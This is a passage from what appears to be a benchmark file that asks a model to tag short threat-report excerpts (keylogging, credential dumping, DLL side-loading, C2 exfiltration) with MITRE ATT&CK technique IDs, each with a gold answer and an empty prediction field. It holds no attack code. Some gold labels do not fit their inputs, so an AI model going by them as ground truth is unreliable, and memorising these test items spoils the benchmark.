Transfer\n", "input": "\nused an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable .", "gold": "- T1221: Template Injection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ROKRAT can encrypt data prior to exfiltration by using an RSA public key.\n\t - T1027: Obfuscated Files or Information\n- Text: The UprotectData() method treats the first two bytes of the Base64 decoded value as a two-byte XOR key\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n- Text: NoComm \u2013 No command, which causes the script to keep sending POST requests. Base64 string \u2013 A module to execute. The module is encrypted with a simple substitution cipher and encoded in base64\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nIf the field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages", "gold": "- T1573: Encrypted Channel", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Matryoshka is capable of keylogging.\n\t - T1056.001: Input Capture - Keylogging\n- Text: Machete stores files and logs in a folder on the local drive.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: This crafted zip archive exploited a WinRAR flaw that makes files in zip archives appear to have a different name and file extension\n\t - T1560: Archive Collected Data\n", "input": "\nsaves information from its keylogging routine as a .zip file in the present working directory.", "gold": "- T1074: Data Staged", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Prior to privilege escalation, Egregor proceeds to Active Directory reconnaissance using tools such as Sharphound or AdFind. These tools are used to gather information about users, groups, computers, and so on\n\t - T1033: System Owner/User Discovery\n\t - T1069.002: Permission Groups Discovery - Domain Groups\n- Text: has used network scanning and enumeration tools, including .\n\t - T1018: Remote System Discovery\n- Text: During Operation Wocao, threat actors used the `net` command to retrieve information about domain accounts.\n\t - T1087.002: Account Discovery - Domain Account\n", "input": "\nFIN6 conducted internal reconnaissance with a Windows batch file leveraging Adfind to query Active Directory, then 7-zip to compress the results for exfiltration", "gold": "- T1018: Remote System Discovery\n- T1069: Permission Groups Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Trojan.Karagany can inject a suspended thread of its own process into a new process and initiate via the \"ResumeThread\" API.\n\t - T1055.003: Process Injection - Thread Execution Hijacking\n- Text: When the Trojan runs as an executable within the \"DsvHelper\" folder, the Trojan will create a shortcut (.lnk file) and save the shortcut to the 'DsvHelper' folder. The embedded payload written to process memory exists in the \"R\" resource and called function in the new payload is named \"RPe.Test.Work\". The function will take another executable embedded in the initial Trojan as a resource named \"M\", which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it's configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe\n\t - T1055.012: Process Injection - Process Hollowing\n- Text: Kivars has the ability to initiate keylogging on the infected host.\n\t - T1056.001: Input Capture - Keylogging\n", "input": "\nWhen it first starts, spawns a new thread to log keystrokes.", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Suckfly used a signed credential-dumping tool to obtain victim account credentials.\n\t - T1003: OS Credential Dumping\n- Text: During Operation Wocao, threat actors used ProcDump to dump credentials from memory.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome, Firefox, and Internet Explorer to a file. This tool was previously observed during a Mandiant incident response in 2018 and, to date, solely utilized by APT34\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1555: Credentials from Password Stores\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", "input": "\nregularly deploys both publicly available and custom password retrieval tools on victims.", "gold": "- T1003: OS Credential Dumping", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\\Documents and Settings\\user\\Application Data\\ATI_Subsystem\\ 6761106f816313394a653db5172dc487,amdhcp32.dll,54kb \u00a0\u2190 32bit dll,CompiledOn:2014.07.02 21:13:24 d596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb \u00a0\u2190 64bit dll,CompiledOn:2014.07.02 21:13:26 bc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb \u2190 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26 4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat The code copies rundll32.exe from windows\\system32 to its newly created %appdata%\\ATI_Subsystem subdirectory as \u201camdocl_as32.exe\u201d alongside the three dll\u2019s listed above\n\t - T1055: Process Injection\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: This most likely means there is some type of DLL hijacking going on by distributing a legitimate McAfee binary with MirageFox to load up the DLL properly into a legitimate looking process\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n- Text: Carberp's bootkit can inject a malicious DLL into the address space of running processes.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", "input": "\n(Source: SecureWorks) Some payloads leveraged DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL", "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Recall that when the malicious code is executed, it invokes the extract_ei function on its own binary image, to check if the file is infected. If so, it opens itself, and reads the trailer to get the offset of where the file\u2019s original bytes are located. It then writes these bytes out to a new file named: .<orginalfilename>1. This file is then set executable (via chmod) and executed (via execl\n\t - T1554: Compromise Host Software Binary\n- Text: The vulnerability tracked as CVE-2022-41352 is a remote code execution flaw that allows attackers to send an email with a malicious archive attachment that plants a web shell in the ZCS server while, at the same time, bypassing antivirus checks.\n\t - T1505.003: Server Software Component - Web Shell\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: . . The bot will report key information back to the C&C, including the result of the various custom API executions. The first communications include any hard-coded C&C followed by the DGA. Shifu uses RC4 encryption in the network communications. Notably, the key for the samples analyzed by iSIGHT Partners is actually the default RC4 key included with the Crypto library, further suggesting this malware is under development. The following is the key observed:\n\t - T1587.001: Develop Capabilities - Malware\n", "input": "\nBackdoor analysis The main loop of the backdoor has two main functions, infoClient and runHandle", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: KeyBoy can gather extended system information, such as information about the operating system, disks, and memory.\n\t - T1082: System Information Discovery\n- Text: Crimson RAT can steal credentials from browsers, collect antivirus information, capture screenshots, and list victim drives, processes, and directories. We have observed how an infected host communicates with a Crimson RAT C&C server to send exfiltrated information including PC name, operating system (OS) information, and the location of the Crimson RAT malware inside the system.\n\t - T1592: Gather Victim Host Information\n\t - T1589: Gather Victim Identity Information\n\t - T1590: Gather Victim Network Information\n\t - T1125: Video Capture\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n\t - T1056: Input Capture\n\t - T1113: Screen Capture\n\t - T1003: OS Credential Dumping\n- Text: In the obfuscated and packed version of the loader, an uncommon API call is used to facilitate code injection. As seen in the image below, the loader uses VirtualAllocExNuma to allocate new memory and store the returned base address. The beginning of an obfuscated shellcode is copied to this address after being decrypted using an RC4 algorithm.In addition to the shellcode an additional PE can be seen in memory\n\t - T1106: Native API\n", "input": "\nhas the ability to obtain a victim's system name and operating system version.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.\n\t - T1187: Forced Authentication\n- Text: Interestingly, the server mapped to kneeexercises[.]net listens for incoming HTTPS connections on several ports and uses common names seen on other C2 domains. For example, ports 2083 and 8443 had CN firstohiobank[.]com, and TCP port 2087 had a TLS certificate with the common name dentalmatrix[.]net. We observed use of these non-standard ports during some of the older intrusions, while the newer ones mostly use port 443\n\t - T1571: Non-Standard Port\n- Text: PinchDuke transfers files from the compromised host via HTTP or HTTPS to a C2 server.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nused TCP port 80 for C2.", "gold": "- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chinese state-sponsored cyber actors used RDP and execute rdpclip.exe to exfiltrate information from the clipboard.\n\t - T1115: Clipboard Data\n- Text: Melcoz can monitor the clipboard for cryptocurrency addresses and change the intended address to one controlled by the adversary.\n\t - T1565.002: Data Manipulation - Transmitted Data Manipulation\n- Text: Pupy uses a keylogger to capture keystrokes it then sends back to the server after it is stopped.\n\t - T1056.001: Input Capture - Keylogging\n", "input": "\nThe executable version of has a module to log clipboard contents.", "gold": "- T1115: Clipboard Data", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: [Screenshot 1] Encrypted Login Packet sent by Gh0stRAT infected PC In addition to a standard malware analysis blog post, I\u2019d also like to take this time to document and describe my methods for analysis, in the hopes that you as a reader will use these techniques in the future\n\t - T1113: Screen Capture\n- Text: LightNeuron can be configured to automatically exfiltrate files under a specified directory.\n\t - T1020: Automated Exfiltration\n- Text: FunnyDream can execute commands, including gathering user information, and send the results to C2.\n\t - T1041: Exfiltration Over C2 Channel\n", "input": "\ntakes periodic screenshots and exfiltrates them.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns\n\t - T1106: Native API\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1120: Peripheral Device Discovery\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: Green Lambert can use multiple custom routines to decrypt strings prior to execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Metamorfo requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer.\n\t - T1204.002: User Execution - Malicious File\n", "input": "\nThe Visual Basic macro performs the following tasks: Opens a handle to the malicious document to read the encoded CAB file Decodes the CAB file and writes it to the disk at %temp%\\setup.cab Encoded CAB file in the Word document", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw\n\t - T1220: XSL Script Processing\n- Text: Registered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain\n\t - T1105: Ingress Tool Transfer\n- Text: GALLIUM compressed and staged files in multi-part archives in the Recycle Bin prior to exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n", "input": "\nThe XSL script contains additional hard coded variables sVarRaz and sVar2RazX, which contain file paths that direct to the downloaded files.\u00a0 The file\u2019s path", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: PoetRAT has exfiltrated data over the C2 channel.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: collected data from local victim systems.\n\t - T1005: Data from Local System\n- Text: Each time a new drive is inserted, generates a list of all files on the drive and stores it in an encrypted file.\n\t - T1119: Automated Collection\n", "input": "\nhas a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A Linux version of checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges. also gathers the username of the victim.\n\t - T1033: System Owner/User Discovery\n- Text: After obtaining the unique ID from the C2 server, the Trojan calls the \u201cSetAbStatById\u201d method to notify the C2 server of its status of \u201c1\u201d to notify the server it had successfully received the filename and file data\n\t - T1041: Exfiltration Over C2 Channel\n- Text: APT3 has used a tool that can obtain info about local and global group users, power users, and administrators.\n\t - T1087.001: Account Discovery - Local Account\n", "input": "\ncollects the victim username and sends it to the C2 server.", "gold": "- T1033: System Owner/User Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: jRAT can map UPnP ports.\n\t - T1120: Peripheral Device Discovery\n- Text: BADNEWS copies files with certain extensions from USB devices to\na predefined directory.\n\t - T1025: Data from Removable Media\n- Text: GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.\n\t - T1119: Automated Collection\n", "input": "\nsearches through connected drives for removable storage devices.", "gold": "- T1120: Peripheral Device Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses port 46769 for C2.\n\t - T1571: Non-Standard Port\n- Text: The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n", "input": "\nstrings, network data, configuration, and modules are encrypted with a modified RC4 algorithm.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Fox Kitten has used cmd.exe likely as a password changing mechanism.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: The server-side component provides a simple graphical user interface for threat actors interacting with web shells\n\t - T1059: Command and Scripting Interpreter\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Sidewinder has used PowerShell to drop and execute malware loaders.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nhas used command-line interfaces for execution.", "gold": "- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MacMa has the ability to record audio.\n\t - T1123: Audio Capture\n- Text: automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.\n\t - T1020: Automated Exfiltration\n- Text: Uploads a file on the victim\u2019s computer to the C&C server\n\t - T1041: Exfiltration Over C2 Channel\n", "input": "\nGet-MicrophoneAudio Exfiltration module can record system microphone audio.", "gold": "- T1123: Audio Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Chimera has used gzip for Linux OS and a modified RAR software to archive data on Windows hosts.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d\n\t - T1041: Exfiltration Over C2 Channel\n\t - T1560: Archive Collected Data\n- Text: The inclusion of both phone and IMSI numbers show the highly targeted nature of this cyber intrusion. If an SMS message contained either a phone number or an IMSI number that matched the predefined list, it was saved to a CSV file for later theft by the threat actor\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1119: Automated Collection\n", "input": "\nAPT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration", "gold": "- T1560: Archive Collected Data", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Revenge RAT uses mshta.exe to run malicious scripts on the system.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.\n\t - T1204.002: User Execution - Malicious File\n- Text: TA505 has used spearphishing emails with malicious attachments to initially compromise victims.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nThe \u2018Company\u2019 field in this case, contains the raw command that the attacker wishes to run, downloading and executing the next stage of the malware. Delivery via HTA Loader. In this case the attackers sent an HTML Application file (.hta) to targets most likely as an email attachment", "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1106: Native API\n- T1010: Application Window Discovery\n- T1074: Data Staged\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gelsemium can use junk code to generate random activity to obscure malware behavior.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: Pteranodon can use a dynamic Windows hashing algorithm to map API components.\n\t - T1027.007: Obfuscated Files or Information - Dynamic API Resolution\n- Text: During Frankenstein, the threat actors used a script that ran WMI queries to check if a VM or sandbox was running, including VMWare and Virtualbox. The script would also call WMI to determine the number of cores allocated to the system; if less than two the script would stop execution.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", "input": "\nBased on dynamic and static analysis of the malware sample associated with the supservermgr[.]com domain however, we were able to determine several unique artifacts which allowed us to expand our dataset and discover additional findings", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.\n\t - T1203: Exploitation for Client Execution\n- Text: Earth Lusca has performed watering hole attacks.\n\t - T1189: Drive-by Compromise\n- Text: is used to automate SQL injection.\n\t - T1190: Exploit Public-Facing Application\n", "input": "\nleverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims\u2019 machines.", "gold": "- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CVE-2015-1197 is a directory traversal vulnerability: extracting specially crafted archives containing symbolic links can cause files to be placed at an arbitrary location in the file system.\n\t - T1083: File and Directory Discovery\n- Text: can scan local network for open SMB.\n\t - T1135: Network Share Discovery\n- Text: Gamaredon Group malware has collected Microsoft Office documents from mapped network drives.\n\t - T1039: Data from Network Shared Drive\n", "input": "\nhas the ability to enumerate files and drives.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: checks for processes associated with anti-virus vendors.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: Bankshot marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: ZxShell can kill AV products' processes.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", "input": "\ninstaller/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses to execute a payload or commands on a remote host.\n\t - T1569.002: System Services - Service Execution\n- Text: The \u2018vsnet\u2019 plugin was intended to spread and launch a payload (BlackEnergy2 dropper itself at the moment) in the local network by using PsExec, as well as gaining primary information on the user\u2019s computer and network. It was a ddos tool compiled to run on ARM systems\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. has also used WMIC during and post compromise cleanup activities.\n\t - T1047: Windows Management Instrumentation\n", "input": "\nuses to perform remote service manipulation to execute a 